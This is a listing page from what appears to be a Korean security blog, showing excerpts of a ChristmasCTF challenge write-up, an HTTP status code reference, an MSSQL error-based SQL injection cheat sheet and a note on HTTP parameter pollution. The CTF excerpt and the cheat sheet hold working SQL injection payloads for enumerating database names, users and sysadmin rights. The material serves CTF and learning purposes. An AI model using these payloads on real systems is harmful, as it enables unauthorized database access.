분류 전체보기847 List of Apache dirs http://wiki.apache.org/httpd/DistrosDefaultLayout 2015. 1. 17. [2014 ChristmasCTF] 산타의 일기장 풀이 요번 ChristmasCTF 에 출제한 산타의 일기장 문제 풀이를 작성합니다.먼저 주어진 페이지에 들어가보면 게시판이 하나 존재합니다.view.php 에서 Blind SQL Injection이 가능합니다.대부분의 함수들을 필터링하고 있고 싱글쿼터또한 필터링하고 있습니다.하지만 locate함수와 char함수는 필터링하지 않으므로 0 or locate(char(97),(select table_name from information_schema.tables where table_schema=database() limit 0,1))=10 or locate(char(98),(select table_name from information_schema.tables where table_schema=database().. 2014. 12. 25. [2014 Whitehat Contest] Write-Up 2014 Whitehat Contest 풀이보고서입니다. 예선 9등으로 아쉽게 본선에는 못갔지만 좋은 경험이었습니다.다음대회때는 더좋은 성적 나올수있게 노력해야겠네요. 2014. 11. 13. HTTP 상태코드 1xx : 정보를 제공함 2xx : 요청이 성공적으로 이뤄짐 3xx : 요청한 해당 자원이 다른곳에 있음 4xx : 요청(클라이언트)에 문제가 있음 5xx : 서버에 문제가 있음 100 Continue : 클라이언트가 서버에게 메시지바디를 포함한 요청을 보냈을 때 받는 응답코드다. 서버의 응답에는 클라이언트가 요청한 헤더를 전송받았고 클라이언트는 계속해서 서버에게 바디를 보낼 수 있다고 나타낸다. 서버는 클라이언트의 요청이 완료되면 두 번째 응답을 보낸다. 200 OK : 클라이언트의 요청이 성공했다는것을 나타낸다. 서버의 응답메시지 바디에 클라이언트가 요청한 내용에 대한 결과를 포함한다. 201 Created : 클라이언트의 PUT 요청이 성공저깅라는 것을 나타낸다. 301 Moved Permanent.. 2014. 11. 1. MSSQL Error Based SQL Injection [MS-SQL Error Based SQLi] 0. 데이터베이스 조회 - ' and 1=(db_name())-- 1. 사용자계정 조회 및 권한 조회 - ' and 1=(select system_user as 'login name')-- - ' and 1=(select system_user)-- - ' and quotename(is_srvrolemember('sysadmin','sa'))=0-- - ' and quotename(is_srvrolemember(0x730079007300610064006D0069006E))=0-- (결과 값이 1이면 true 0이면 false) 2. 사용자 이름 조회 - ' and 1=(user)-- - ' and 1=(select user as 'user name')-- - .. 2014. 10. 24. HTTP Parameter Pollution 하나의 변수에 대해 연속적으로 접근했을시 어떠한 값을 인식하는지 환경에 따른 차이점이다.ex. p=1&p=2 일 시 PHP/APACHE 의 환경에서는 p=2로 받아들인다. 2014. 10. 10. 이전 1 ··· 110 111 112 113 114 115 116 ··· 142 다음